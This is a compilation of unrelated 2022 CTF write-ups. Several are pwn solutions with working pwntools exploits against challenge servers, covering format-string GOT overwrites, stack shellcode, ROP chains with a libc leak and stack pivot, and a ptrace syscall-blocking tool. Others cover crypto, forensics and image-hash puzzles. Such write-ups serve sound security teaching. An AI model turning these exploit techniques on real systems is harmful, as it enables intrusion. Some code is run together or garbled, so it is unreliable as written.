# PicoCTF2022 : RSP challenge writeup Let's start by downloading the file from the link. We get the source code of the program with the flag redacted. The goal is to understand the program's logic and exploit it to get the flag. ![image](images/main.png) The description tells us that this is a rock/paper/scissors game program. We start by taking a look at the `main()` function in the source code. The program prints a menu and then takes an input through the `tgetinput()` function. It calls the `play()` function and if it returns *true* it increments the *win* counter, which is initialized to 0 at the beginning of the file. When the *win* counter becomes equal to 5, the flag gets printed on the screen. Now the goal is to analyze the `play()` function to understand how to get *True* as the returned value. ![image](images/play.png) The function asks us to choose between rock, paper and scissors. It takes our input and puts it in the *player_turn* array that it defined at the beginning of the function. It also uses two other arrays : *hands* and *loses*. They are both character pointers arrays. The first one contains pointers to the strings "rock", "paper" and "scissors". The second contains pointers to the same strings, but in a different order, so that every string in *hands* is allineated with the corresponding losing string in the *loses* array. ![image](images/hands_loses.png) `play()` generates a random integer with the `rand()` function and it does a modulus 3 operation on it to make sure that the number is included between 0 and 2. That's because *computer_turn* will be used as an index in the *hands* and *loses* arrays. Then it prints the string we inserted as input and the string chosen by the computer, which is picked randomly from the *loses* array. Then the `strstr()` function is used. As usual, we can use the man page to see what it does. ![image](images/strstr_man.png) This function *"... finds the first occurrence of the substring needle*(the first supplied string) *in the string haystack*(the second supplied string)*..."*. It then *"... returns a pointer to the located substring or NULL if the substring is not found"*. So what happens is that our choice and the computer choice (which is picked from the *loses* array using the *computer_turn* index) get printed onto the screen. Then the program takes a string from the *losing* array using the same random index. That is the string that beats the one the computer chose. If it's equal to the string we inserted, then we won the match. So we need to supply a string which will always contain whatever string the computer chooses from the *loses* array. The string we want could be, for example, "rockpaperscissors". In this way, the function will always return a pointer and we'll always win the match, regardless of our opponent choice. If we do it 5 times in a row, we get the flag. Let's connect with netcat to try this out. ![image](images/flag.png) It worked, we got the flag.
# Challenge: ez-x0r```textContent of flag.enc: BRQDER1VHDkeVhQ5BRQfFhIJGw== From Base64:.....U.9.V.9..... . XOR Bruteforce:Key = 66: crew{3z_x0r_crypto} NOTE: I did this in Cyberchef.```
## Question * isakhiwo somtya silala* Author : st4rn#0086* nc ubume.crewctf-2022.crewc.tf 1337 [chall](https://github.com/tj-oconnor/ctf-writeups/tree/main/crew_ctf/ubume/chall) ## Solution The binary takes user input and displays it without a format specifier. ```00400729 int32_t main(int32_t argc, char** argv, char** envp) __noreturn 00400729 {0040073d void* fsbase;0040073d int64_t var_10 = *(int64_t*)((char*)fsbase + 0x28);00400748 ignore_me();00400754 puts("Haven't we met before?");0040076d void var_228;0040076d read(0, &var_228, 0x200);00400781 printf(&var_228);0040078b exit(0);0040078b /* no return */0040078b }``` Exit() the only function called after the format string vulnerbaility. So we can just overwrite it with the address of the win() function. We'll use pwntools fmtstr_payload() to create the format write, that overwrites the got address of exit() with the address of win(). ```pythonfrom pwn import * binary = args.BIN context.terminal = ["tmux", "splitw", "-h"]e = context.binary = ELF(binary)r = ROP(e) gs = '''continue''' def start(): if args.GDB: return gdb.debug(e.path, gdbscript=gs) elif args.REMOTE: return remote('ubume.crewctf-2022.crewc.tf', 1337) else: return process(e.path) p = start() payload_writes = { e.got['exit']: e.sym['win']} payload = fmtstr_payload(6,payload_writes,write_size='short')p.sendline(payload)p.interactive()``` Running it gives us the flag. ```{7:52}~/workspace/crew-ctf/ubume ➭ python3 pwn-ubume.py BIN=./chall REMOTE[*] '/root/workspace/crew-ctf/ubume/chall' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)[*] Loading gadgets for '/root/workspace/crew-ctf/ubume/chall'[+] Opening connection to ubume.crewctf-2022.crewc.tf on port 1337: Done[*] Switching to interactive modeHaven't we met before? new it. We've met before.$ cat flagcrew{format_string_aattack_f0r_0verr1ding_GOT_!!!}
# Cape Kennedy ## The Problem Points: 100 Rating: Easy Flavor Text:```Please find valid input for this program that doesn't include special characters. Don't forget to submit in flag format. (remember this is a themed ctf, the answer is NOT random)``` Author: GlitchArchetype Attachments : [moon.py](https://github.com/BrennenWright/CaptureTheFlag-Writeups/blob/main/2022/SpaceHeroesCTF/CapeKennedy/moon.py) ![](https://github.com/BrennenWright/CaptureTheFlag-Writeups/blob/main/2022/SpaceHeroesCTF/CapeKennedy/start.png) ## Solution Downloaded moon.py and reviewed the code```import sys def main(): if len(sys.argv) != 2: print("Invalid args") return password = sys.argv[1] builder = 0 for c in password: builder += ord(c) if builder == 713 and len(password) == 8 and (ord(password[2]) == ord(password[5])): if (ord(password[3]) == ord(password[4])) and ((ord(password[6])) == ord(password[7])): print("correct") else: print("incorrect") else: print("incorrect") if __name__ == "__main__": main() ``` its not a big program so shouldn't be tough to back into the input, its an option to brute force it but lets just work out the logic this one tells me the input is a single value input: ```if len(sys.argv) != 2: ``` the flavor text says no special chars so the flag format is not the input but the xxxxx's: ``` shctf{xxxxxxxx}? ``` googled: python ord value and picked a tutorial site to work out the basic function per this site: >"The ord() function in Python accepts a string of length 1 as an argument and returns the unicode code point representation of the passed argument. For example ord('B') returns 66 which is a unicode code point value of character ‘B’." - https://beginnersbook.com/2019/03/python-ord-function/ it looks like we have an ASCII flip going on so pull up: https://www.ascii-code.com/ ``` password = sys.argv[1] ``` this tells me the input is tested like: ``` py moon.py XX ``` this tells me the input is likely 8 chars like xxxxxxxx so shctf{xxxxxxxx}? ``` len(password) == 8 ``` need to lookup the ord function as I do not use python often ![](https://github.com/BrennenWright/CaptureTheFlag-Writeups/blob/main/2022/SpaceHeroesCTF/CapeKennedy/googleord.png) looks like the ord call and the third(3-1 because we count from 0 in CS) and sixth character are the same value ``` ord(password[2]) == ord(password[5]) ``` and 4th and 5th are the same, and 7th and 8th are the same``` ord(password[3]) == ord(password[4])) and ((ord(password[6])) == ord(password[7])``` what hints do we have? >"CapeKennedy" is the title so lets google it> "On November 28, 1963 President Lyndon B. Johnson announced in a televised address that Cape Canaveral would be renamed Cape Kennedy" - https://sonalsart.com/why-did-cape-kennedy-changed-name/ found a space center and well know launch site so the logic is: * the string is eight chars long likely meeting the theme* the string does not include special characters(65-90 + 97-122 in ASCII) and no shctf{} included* the sum of the ascii values of these chars is 713 (so the average char value is 89.125, this means we are going to be light on the capitals)* the 3rd and 6th character are the same* the 4th and 5th character are the same* the 7th and 8th character are the same as we are looking for an eight character input Canaveral, kennedy, florida and such don't work made a new version called [moon_trace.py](https://github.com/BrennenWright/CaptureTheFlag-Writeups/blob/main/2022/SpaceHeroesCTF/CapeKennedy/moon_trace.py) so I can run with the variables printing out to console> python [moon_trace.py](https://github.com/BrennenWright/CaptureTheFlag-Writeups/blob/main/2022/SpaceHeroesCTF/CapeKennedy/moon_trace.py) xxxxxxxx I started messing with word-list generators and the randomness didn't work that well until I built a list of all possible correct values to search against. (this is a big ridiculous list and all values work so no bruit force option anyhow) I then googled all of the keywords gathered moon Cape Kennedy Canaveral ![](https://github.com/BrennenWright/CaptureTheFlag-Writeups/blob/main/2022/SpaceHeroesCTF/CapeKennedy/google.png) I ended up looking into moon tree as the "ree" matched the last three logic terms and in the course of digging into one site found Apollo. ![](https://github.com/BrennenWright/CaptureTheFlag-Writeups/blob/main/2022/SpaceHeroesCTF/CapeKennedy/moon_tree.png)![](https://github.com/BrennenWright/CaptureTheFlag-Writeups/blob/main/2022/SpaceHeroesCTF/CapeKennedy/apollo.png) This reminded me of the moon landing and led to searching the word-list for Apollo and finding a few of the correct ones that ended in numbers. Apollo11 being historic and the likely choice. ![](https://github.com/BrennenWright/CaptureTheFlag-Writeups/blob/main/2022/SpaceHeroesCTF/CapeKennedy/wordlist.png) tripple check this against the source and it reports correct()```python moon_trace.py ``` ## Flag And done!!``` shctf{Apollo11}``` ## Final NotesI know i didnt need to go into so much detail as i reviewed the mmon.py script but i was in a detailed note mode.
We are given an IP and port to connect via netcat.It greets me with a description of the challenge and an example maze. After starting the challenge by entering `Y`, I get a huge maze that I will have to solve in only a few seconds.I will have to write a tool for it! ## Parsing the Maze The most important step in solving the maze automatically is parsing it into a matrix of some sort. To better read it and automate everything I used `pwntools` to solve it. ```pythonimport pwn as p conn = p.remote("192.168.125.100",9003) conn.recvuntil(b'Ready? (Y/N)')conn.sendline("Y") # Getting and parsing the labyrinth by removing spaces & splitting into a matrixlab = list(map(lambda x: list(x),conn.recvuntil("\n\n").decode().strip().replace(" ","").split("\n")))``` ## Actually solving the maze To make it easier, I searched for a good pathfinding algorithm on the internet and found this one: [pathfinding](https://pypi.org/project/pathfinding/)I needed to convert it to a matrix of weights first so that the tool can understand it.Lets just replace the `#`'s with 0 and everything else with 1. ```python# A very complex way of replacing everything in the matrixlab = list(map(lambda x: list(map(lambda y: int(y.replace("#", "0").replace("O", "1").replace("L", "1").replace("H", "1")), x)),lab))```And then solving it with the pathfinding package: ```pythonfrom pathfinding.core.diagonal_movement import DiagonalMovementfrom pathfinding.core.grid import Gridfrom pathfinding.finder.a_star import AStarFinder grid = Grid(matrix=lab) start = grid.node(0, 0) # Where L wasend = grid.node(len(lab) - 1, len(lab[len(lab) - 1]) - 1) # Where H wasfinder = AStarFinder(diagonal_movement=DiagonalMovement.never)path, runs = finder.find_path(start, end, grid)``` The path variable holds all of the moves it did to solve the maze as tuples `(0,1), (0,2), (1,2)...` but the challenge expects us to send the directions... ## Converting the moves to directions and sending the solution ```pythonlast = path[0]directions = {(0, 1): "D", (0, -1): "U", (1, 0): "R", (-1, 0): "L"} # A dict that replaces multiple if statementslog = ""for i in path: if last == i: # Ignoring the first run continue log += directions[tuple(map(lambda a, b: a - b, i, last))] # Subtracting two tuples last = i conn.sendline(log) # Sending the directionsprint(conn.recvall().decode()) # Prints the flag and the rest of the response``` Done!
**TLDR** (Full writeup @ [https://www.nullhardware.com/reference/hacking-101/picoctf-2022-greatest-hits/solfire/](https://www.nullhardware.com/reference/hacking-101/picoctf-2022-greatest-hits/solfire/))1. To successfully call into `handle_withdraw`, the first account (index 0) must contain the substring `C1ock` when b58 encoded. It does not need to exist or have initialized data, but it **MUST NOT** be `SysvarC1ock11111111111111111111111111111111` (that account contains valid data and will not pass the timestamp check).2. `handle_withdraw` contains an off-by-one error, allowing you to read/write past the end of ledger data.3. This is *only* exploitable if you manually create the account yourself with exactly `0` data bytes allocated and specify `solfire.so` as the owner.4. Call `handle_withdraw` with the offset set to `0x280` and a lamport value of approximately 50,000 or more (*but not too much more*). You will also be required to know the nonce for the vault account.5. ...6. Profit!
## Question * beginner friendly* Author : st4rn#0086* nc wiznu.crewctf-2022.crewc.tf 1337 [chall](https://github.com/tj-oconnor/ctf-writeups/tree/main/crew_ctf/wiznu/chall) ## Solution The binary has seccomp enabled that only allows read, write, open syscalls ```└─# seccomp-tools dump ./chall line CODE JT JF K================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x07 0xc000003e if (A != ARCH_X86_64) goto 0009 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005 0004: 0x15 0x00 0x04 0xffffffff if (A != 0xffffffff) goto 0009 0005: 0x15 0x02 0x00 0x00000000 if (A == read) goto 0008 0006: 0x15 0x01 0x00 0x00000001 if (A == write) goto 0008 0007: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0009 0008: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0009: 0x06 0x00 0x00 0x00000000 return KILL ``` Other than that, it lacks most protections (namely ASLR and NX). ```└─# pwn checksec ./chall [*] '/root/workspace/chall' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments``` Combined with the fact that the binary leaks the address of the stack, we should be good to return to shellcode we placed on the stack. ```pwndbg> rStarting program: /root/workspace/chall Special Gift for Special Person : 0x7fffffffe2d0``` We'll just return to shellcode and use only the open, read, and write syscalls to cat the flag on the server. ```pythonfrom pwn import * binary = args.BIN context.terminal = ["tmux", "splitw", "-h"]e = context.binary = ELF(binary)r = ROP(e) gs = '''continue''' def start(): if args.GDB: return gdb.debug(e.path, gdbscript=gs) elif args.REMOTE: return remote('wiznu.crewctf-2022.crewc.tf',1337) else: return process(e.path) p = start() def ret_leak(): p.recvuntil(b"Special Gift for Special Person : ") leak = int(p.recvline(),16) return leak def build_shellcode(): FLAG_LEN = 40 shellcode = asm(shellcraft.open(file='flag', oflag=0, mode=0)) shellcode += asm(shellcraft.amd64.linux.read(fd='rax', buffer='rsp', count=FLAG_LEN)) shellcode += asm(shellcraft.amd64.linux.write(constants.STDOUT_FILENO, 'rsp', FLAG_LEN)) shellcode += asm(shellcraft.nop())*220 return shellcode buf = build_shellcode()buf += p64(ret_leak()) p.sendline(buf)p.interactive()```` Running gives us the flag ```$ python3 pwn-wiznu.py BIN=./chall REMOTE[*] '/root/workspace/crew-ctf/wiznu/chall' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments[*] Loading gadgets for '/root/workspace/crew-ctf/wiznu/chall'[+] Opening connection to wiznu.crewctf-2022.crewc.tf on port 1337: Done[*] Switching to interactive mode> crew{ORW_come_to_the_rescue_st4rn_h3r3!}[*] Got EOF while reading in interactive```
## Question Author: LaneAttack the server and get the flag!SNI: trivial [trivial](https://github.com/tj-oconnor/ctf-writeups/tree/main/tamu_ctf/trivial/trivial) ## Solution Just sprayed the address of the win function across the stack. ```pythonfrom pwn import * e = context.binary = ELF(args.BIN) p = remote("tamuctf.com", 443, ssl=True, sni="trivial")win = p64(e.sym['win']) p.sendline(win*100)p.interactive()```
## Pt. 1We get an email file (.eml) and the challenge is to find out what was deleted from the file... ```Received: from 10.197.33.204...Return-Path: <[email protected]>X-Originating-Ip: [209.85.221.45]Received-SPF: pass (domain of gmail.com designates 209.85.221.45 as permitted sender)Authentication-Results: ...X-Apparently-To: [email protected]; Fri, 15 Apr 2022 06:03:02 +0000X-YMailISG: ...Received: from 209.85.221.45...Received: by mail-wr1-f45.google.com with SMTP id u3so9536261wrg.3...DKIM-Signature: ...X-Google-DKIM-Signature: ...X-Google-Smtp-Source: ABdhPJyaUwECUfiVnHLMvCVoOGSDlrFjphDMOXwSo8pSUztrUcs+gK7lHOKWwReyKsHGHeQG13Psbc5aQ2asjRuWTvE=X-Received: by 2002:a05:6000:1564:b0:20a:7727:27b0 with ...MIME-Version: 1.0From: crew ctf <[email protected]>Date: Fri, 15 Apr 2022 08:02:49 +0200Message-ID: <CAG+6dK2LBZJeWOCXgSp_JnxShdjjkuoXpcxp3ChSLQ6dfkUjZQ@mail.gmail.com>Subject: Help me!To: [email protected]Content-Type: multipart/alternative; boundary="000000000000c0332a05dcab29d2"Content-Length: 677 --000000000000c0332a05dcab29d2Content-Type: text/plain; charset="UTF-8" Hey, crushed kiwi I hate this loop of college, and I need your help. Canyou meet me at lost immediately? --000000000000c0332a05dcab29d2Content-Type: text/html; charset="UTF-8"Content-Transfer-Encoding: quoted-printable ... --000000000000c0332a05dcab29d2--``` I realized that it has to be from a google email so I sent myself an email and compared both.The `X-Gm-Message-State:` Header is missing! This was the solution for the first part of the challenge.
## Pt. 2 In this part, we need to find the MD5 hash of the associated LNK File... I attempted to create it myself but realized that there is information inside LNK files, that we cannot know.I was on the verge of giving up and thought that maybe not all of the files got exported... I used FTK Imager once again to export a list of all files as inside the image as .csv... Works! With the help of `STRG+F` I searched for "ScreenSketch" and there were actually some weirdly named lnk files inside!```csvef6024630ca7a7601a83ecb5af634ce6,"d66260224de3d30616b765dcaddbb6c803b8e8ec","ScreenShot.ad1\E:\ScreenShot\ScreenShot [AD1]\Users\0xSh3rl0ck\AppData\Roaming\Microsoft\Windows\Recent\ms-screensketcheditisTemporary=true&source=screenclip&sharedAccessToken=0CFD1BEB-8309-414C-80D1-8F7D1132DA56&secondarySharedAccessToken=0557B721-9B6F-4EED-8FCC-0523E30625B5&viewId=-198227.lnk"```It even includes the MD5 hash of that files. Challenge solved. *Click the link for images*
## Pt. 3 For the last challenge, we need to find a `secret text`. I instantly knew the solution as I took a closer look at the screenshot! As we can see, there is a base64 encoded string at the bottom of the image: `Y3Jld3tUcjRjazFuZ19zY3IzM25zaDB0c193MXRoX0xOS19mMWwzc30=`which translates to: `crew{Tr4ck1ng_scr33nsh0ts_w1th_LNK_f1l3s}` I first thought that that might be a decoy flag but it actually worked for the last part! *Click the link for images*
# readflag* Category: `Misc`* Solves: `10`* Points: `277`* Description: `All you need is strings.` ```c#include <stdio.h> const char flag[] = "fak3pts{nyanyanyanyanyanyanyanyanyanyanyanyanyanyanyanya}"; int main() { FILE *random; if ((random = fopen("/dev/urandom", "rb")) == NULL) { perror("fopen"); return 1; } for (const unsigned char *f = flag; *f; f++) { unsigned char r; if (fread(&r, 1, 1, random) != 1) { perror("fread"); return 1; } printf("%02x", *f ^ r); } printf("\n"); return 0;}``` This looks simple enough. The flag is printed out after being XORed with an unpredictable one-time-pad. We can't recover the flag from the output, but the flag is in plaintext - let's just read the binary! `---s--x--x 1 root root 16848 Mar 16 07:46 readflag` Unfortunately, we can't. We only have execute permissions on the binary. How can we access the flag? Ideas:- Use `LD_PRELOAD` to make the data returned from `fread` predictable? * The SUID bit is set, which causes `LD_PRELOAD` and similar variables to be cleared- Use `ptrace` + `PTRACE_PEEKTEXT` to read the flag out of binary memory?* As the filesystem permissions do not allow reading or writing, we don't have the ability to do this, and PEEKTEXT will be denied- Use `PTRACE_SYSCALL` to prevent `/dev/urandom` from being read out?* This works - under `ptrace`, even though we can't edit memory, we can trace the programs behaviour and modify its registers. Some light debugging reveals that the initial `fread` causes `read(fd, <buf>, 4096)`, as the program buffers the extra file data. So, we write a program to simple disable this syscall: ```c#include <sys/ptrace.h>#include <sys/types.h>#include <sys/wait.h>#include <unistd.h>#include <stdlib.h>#include <fcntl.h>#include <stdio.h>#include <errno.h>#include <sys/personality.h>#include <sys/user.h> int main(int argc, char *argv[]){ pid_t traced_process; struct user_regs_struct regs = {}; long ins; if(argc != 2) { printf("Usage: %s <program to be traced>\n", argv[0], argv[1]); exit(1); } int pid = fork(); if (pid == 0) { ptrace(PTRACE_TRACEME, 0, 0, 0); execve(argv[1], &argv[1], NULL); puts("exec failed"); return -1; } wait(NULL); while (1) { int blocked = 0; // Wait until the child makes a syscall ptrace(PTRACE_SYSCALL, pid, 0, 0); waitpid(pid, 0, 0); ptrace(PTRACE_GETREGS, pid, 0, ®s;; // Are we trying to read /dev/urandom? if (regs.orig_rax == 0 && regs.rdx == 4096) { blocked = 1; // Set it to use an invalid syscall number so it will fail regs.orig_rax = -1; ptrace(PTRACE_SETREGS, pid, 0, ®s;; } // Continue on with the now blocked syscall ptrace(PTRACE_SYSCALL, pid, 0, 0); waitpid(pid, 0, 0); // The program checks return value of the read, so we need to make sure that the return value isn't `-ENOSYS` if (blocked) {regs.rax = 1; ptrace(PTRACE_SETREGS, pid, 0, ®s;; } } return 0;}``` We upload this on the remote, and execute it against `/readflag` to receive: `7a6572307074737b446561722064696172792e2e2e20576169742c2061726520796f75722072656164696e6720746869733f2053746f70217d0a`Decoding this from hex, we get the real flag: `zer0pts{Dear diary... Wait, are your reading this? Stop!}`
The challenge implements a textbook RSA signature system, with which we can sign messages.In order to retrieve the flag, we need to send the signed string "I love cookies.", which is impossible:
## Quick Mafs was an pwn challenge from TAMUctf 2022. It's type of challenge that is called automatic exploit generator, a mix of coding and pwning challenge. A server where we connect send us a succession of elf binaries, (as hexadecimal dump). We have to quickly analyze them and exploit them. That's a classic type of challenge. so how to start..? well we will first download some of the binaries sent by the server, save them, and analyze them. Let's see by how much they vary, and reverse them. In the case of this challenge the author told us there is a print function function to call, and each time indicate us a value to put in `eax` before calling print. That's the condition to achieve for each binaries, and there will be five of them. let's reverse somes of the provided binaries, here is the `vuln()` function: ![](https://github.com/nobodyisnobody/write-ups/raw/main/TamuCTF.2022/pwn/Quick.Mafs/pics/reverse1.png) you can see in the vuln function, that there is an intended buffer overflow of 0x2000 bytes, read directly at `rsp` address. where we will put our ROP payload. now let's have a look at `print()` function: ![](https://github.com/nobodyisnobody/write-ups/raw/main/TamuCTF.2022/pwn/Quick.Mafs/pics/reverse2.png) we can see in the print function that the `eax` value is saved on stack, then it's two first lsb (16bit value so), are written to stdout as a raw 16 bit value.. then the program exits.. The problem is that there are no simple gadget to set `eax` to the desired value.. instead, each binaries provided by the servers, included hundreds or arithmetical gadgets, based on `ax`, and the various values pointed by `rbx` register The intended solution seems to be to use a sort of solver like z3, or angr eventually, to set `eax` to the given values, by using theses arithmetic gadgets... That's probably possible, z3 can do "miracles", but it's too much complicated... so instead of this we will use a serie of gadgets so set first `rdx` to 2, to output the 2 bytes containing the required value, but without passing via the `eax` register. we will put the given value to be returned , at the end of our payload (on stack so), then we will jump in the middle of the `print()` function, precisely at the address `0x40179b` ![](https://github.com/nobodyisnobody/write-ups/raw/main/TamuCTF.2022/pwn/Quick.Mafs/pics/gadget.png) like this, we will output directly the 2 last bytes to stdout...as required... so here is the exploit ```python3#!/usr/bin/env python# -*- coding: utf-8 -*from pwn import *import binascii context.update(arch="amd64", os="linux")context.log_level = 'info' p = remote("tamuctf.com", 443, ssl=True, sni="quick-mafs") for binary in range(5): p.recvuntil('rax = ',drop=True) rax = int(p.recvuntil('\n',drop=True),16)# instructions = p.recvline() # the server will give you instructions as to what your exploit should do# print(instructions) temp = p.recvuntil('\n',drop=True) elf = binascii.unhexlify(temp) with open("elf", "wb") as file: file.write(elf) exe = ELF('./elf') gadget3 = 0x000000000040122c # pop rdx ; add byte ptr [rsi + 0x2b], etc... # we will use this code as a gadget indeed ''' 0x000000000040179b <+12>: mov rsi,rsp 0x000000000040179e <+15>: mov rdi,0x1 0x00000000004017a5 <+22>: mov rax,0x1 0x00000000004017ac <+29>: syscall 0x00000000004017ae <+31>: mov rdi,0x0 0x00000000004017b5 <+38>: mov rax,0x3c 0x00000000004017bc <+45>: syscall 0x00000000004017be <+47>: nop 0x00000000004017bf <+48>: pop rbp 0x00000000004017c0 <+49>: ret ''' # set rdx = 2 prelude = p64(0xdeadbeef)+p64(gadget3)+p64(2) prelude += p64(0x000000000040179b) # convert payload to hexa string and wanted value payload = binascii.hexlify(prelude + p16(rax)) p.sendline(payload)p.interactive()```*nobodyisnobody still pwning things...*
Alright, I have to add this writeup because there won't be a solution here anyway and I spent the entire ctf trying to solve this (drunk). Anyway, the first steps are pretty straightforward once you figure it out. Basically you are given a file that contains a shell executable that can be ran on linux for the server and windows for the client - as mentioned in the challenge's description. The file's code is grouped into two parts correlating to each OS, and upon investigating further we can see that for the given operating system we are running the file in, there will be a tmp file that runs the actual executable through the console. Let's take a look at the code meant to run in powershell.https://imgur.com/a/qcJPFqA When we run this through powershell this is what we get.https://imgur.com/Cik4rpjIf we try typing a string that's length is not equal to 10 we don't get any output and the powershell just closes ( I only added the input at the end for my sake) So after figuring out that the actual executable is stored elsewhere upon generation, I added some code to the powershell to print out the random path and then ran the executable through a disassembler.https://imgur.com/2jqmPvP I used IDA's crazzzy decompiler to give me a simple rundown of how the password checking works. There seems to be a very lengthy set of characters that gets decoded using the input received after the password verifier. If the password is correct then we use that password as the flag, as seen in the print function. We take a look into the "validstring" function that I renamed and this is what I scratched my head for about 2 hours. https://imgur.com/tZL8yq3 My struggle was not understanding the C code through this decompiled hot stuff. But essentially what it boils down to is it checks if our input is a prime number and if so, checks to see if the number starts with "21", and ends with "47".. I can't believe I tried writing a brute force prime checker when it's literally just the max int number. https://imgur.com/wAlj56e Yay it worked, alas I couldn't submit the flag in time so I have no idea if 2147483647 is the correct flag. It just works when running it through the client side. https://imgur.com/DGLcnyD
## myopia The code is using the [abonander/img_hash](https://github.com/abonander/img_hash) library to calculate the perceptual hash of the image. To get this flag, we need to find two images with the same perceptual hash of `ERsrE6nTHhI=` (in Base64), but one showing the text "sudo please", while the other showing the text "give me the flag". The text is OCR'd by the tesseract library. Since the given image `img1.png` with the text "sudo please" already have this target perceptual hash, what's remaining is to generate the second image that will be recongnized by the OCR library as having the text "give me the flag", but having the same perceptual hash calculated by the `img_hash` library. We don't think it's a good idea to trick the OCR library since the codebase is large and is widely used, so we started by looking at the `img_hash` library. The first thing the `img_hash` library does to the image is to convert it into a grayscale image. This logic is done by the `image` library. Looking into the source code, it's doing the basic luminance calculation. However, we found that this image library supports reading PNG files with transparent layer (RGBA), but will ignore the alpha value in the calculation. Therefore, near-transparent pixels will be included in the final grayscale image as well. Here we took a guess that tesseract library will deal with transparent images correctly, meaning it should ignore near-transparent pixels. We generated an image that has the same pixel values of `img1.png`, but every pixel having alpha values of only 1. Then we added a black text saying "give me the flag" on top of the black area of the image, so if you directly view it on a light background, you can only see the text. But if you convert the image into grayscale, you would see the same image as `img1.png`. As what we have guessed, this worked very well. **Payload:**![](https://i.imgur.com/GfIAPAl.png) ## hyperopia The second flag is the reverse of the first: we need to find two images with different perceptual hash, but the file content only differs by one bit, and both have to be OCR'd as having the same text "give me the flag". Thinking that the JPEG format is extremely robust, we simply generated a small image in JPEG format with "give me the flag" text on it, and brute-forced every possible bit flip, until we find one that satifies the conditions (can be read by the image library and OCR'd to have the correct text, while having different perceptual hash). Although we have no idea which part in the file we touched, but by the look of the final image, it seems that it's some coefficient of the DCT block. **Payload:**![](https://i.imgur.com/BykhM1T.jpg) ![](https://i.imgur.com/XsG7Vuf.jpg)
### Rop Golf was an pwn challenge from TAMUctf 2022. I got first blood on it (while playing for friends of Flag Poisonning) A type of restricted ROP, where you have only 4 ROP entries to do you rop, so we will have to do a succession of payloads.. Here is the vulnerable function: ![](https://github.com/nobodyisnobody/write-ups/raw/main/TamuCTF.2022/pwn/Rop.Golf/pics/reverse.png) you can see the buffer overflow, we will have 0x20 bytes, so 4 ROP entries avaible for our ROP so we will use successive payloads: * 1st payload: we dump `puts()` **GOT** entry, with `puts()`, then go back to vuln function for second round * 2nd payload: we read the third payload on the `.bss `with `gets()` function, then stack pivot to it * 3rd payload: we will use two payloads one is a `open directory / getdents (list dirs) / write output to stdout ` payload this first type of payload list directories, and discover the flag 'quasi random' name the second type is a `open file / read it / write it to stdout` to dump our flag.. and that's all... as you can see... ![](https://github.com/nobodyisnobody/write-ups/raw/main/TamuCTF.2022/pwn/Rop.Golf/pics/gotshell.gif) and here is my exploit commented... hope you will undestand it :) ```python3#!/usr/bin/env python# -*- coding: utf-8 -*-from pwn import * context.update(arch="amd64", os="linux") exe = ELF('./rop_golf_patched')libc = ELF('./libc.so.6') host, port = "206.189.113.236", "30674" p = remote("tamuctf.com", 443, ssl=True, sni="rop-golf") pop_rdi = 0x00000000004011fb # pop rdi ; retpop_rbp = 0x0000000000401129 # pop rbp ; retleave_ret = 0x0000000000401161 # leave ; ret # 1st payload, first we leak puts got entry to calculate libc base, then return to vulnpayload = b'A'*0x28+p64(pop_rdi)+p64(exe.got['puts'])+p64(exe.sym['puts'])+p64(0x401142)p.sendafter('hi!\n', payload) # calculate libc baseleak = u64(p.recvuntil(b'\n',drop=True).ljust(8,b'\x00'))print('leak = '+hex(leak))libc.address = leak - libc.sym['puts']print('libc base = '+hex(libc.address)) # 2nd payload, read the first payload on .bss and pivot to itbss = 0x404c00onegadgets = one_gadget('libc.so.6', libc.address)payload = b'A'*0x20+p64(bss+64-8)+p64(pop_rdi)+p64(bss)+p64(libc.sym['gets'])+p64(leave_ret)p.send(payload) # various gadgetspop_rdx = libc.address + 0x0000000000044198 # pop rdx ; retpop_rsi = libc.address + 0x000000000002440e # pop rsi ; retpop_rax = libc.address + 0x000000000003a638 # pop rax ; retxchg_edi_eax = libc.address + 0x0000000000116dbc # xchg eax, edi ; retsyscall_ret = libc.address + 0x00000000000b58a5 # syscall; ret;fname = b'/pwn/066A2462DEB399BA9183A91FC116914C.txt'fname = fname.ljust(64,b'\x00') # 3rd oayload with fname gonna dump# open fnamepayload4 = fname + p64(pop_rdi)+p64(bss)+p64(pop_rsi)+p64(0)+p64(pop_rax)+p64(2)+p64(syscall_ret)# read filepayload4 += p64(xchg_edi_eax)+p64(pop_rsi)+p64(bss)+p64(pop_rdx)+p64(0x80)+p64(pop_rax)+p64(0)+p64(syscall_ret)# write file content to stdoutpayload4 += p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(bss)+p64(pop_rdx)+p64(0x80)+p64(pop_rax)+p64(1)+p64(syscall_ret)#exitpayload4 += p64(pop_rax)+p64(60)+p64(syscall_ret)p.sendline(payload4) # alternative payload that does getdents, and return directory content #payload4 = fname + p64(pop_rdi)+p64(bss)+p64(pop_rsi)+p64(0)+p64(pop_rax)+p64(2)+p64(syscall_ret)#payload4 += p64(xchg_edi_eax)+p64(pop_rsi)+p64(bss-0x100)+p64(pop_rdx)+p64(0x200)+p64(pop_rax)+p64(78)+p64(syscall_ret)#payload4 += p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(bss-0x100)+p64(pop_rdx)+p64(0x200)+p64(pop_rax)+p64(1)+p64(syscall_ret)#payload4 += p64(pop_rax)+p64(60)+p64(syscall_ret)#p.sendline(payload4) #buff = p.recv()#print(dirents(buff)) p.interactive()``` *nobodyisnobody still pwning things...*
# Lost Key##### Can you decipher the following? JNVTG-GKJ{Q1o3t3v3_q3g0u1rb_e17n_oa0ae_73b7}##### By the way, I lost the key. Sorry! We have a keyed cipher, which i thought was vigenere, so i tried bruteforcing the key since the first part of the text is known (OFPPT-CTF). For this task i used [cyberchef](https://gchq.github.io/CyberChef/). Turns out the key for the ciphertext was **vigenere.**
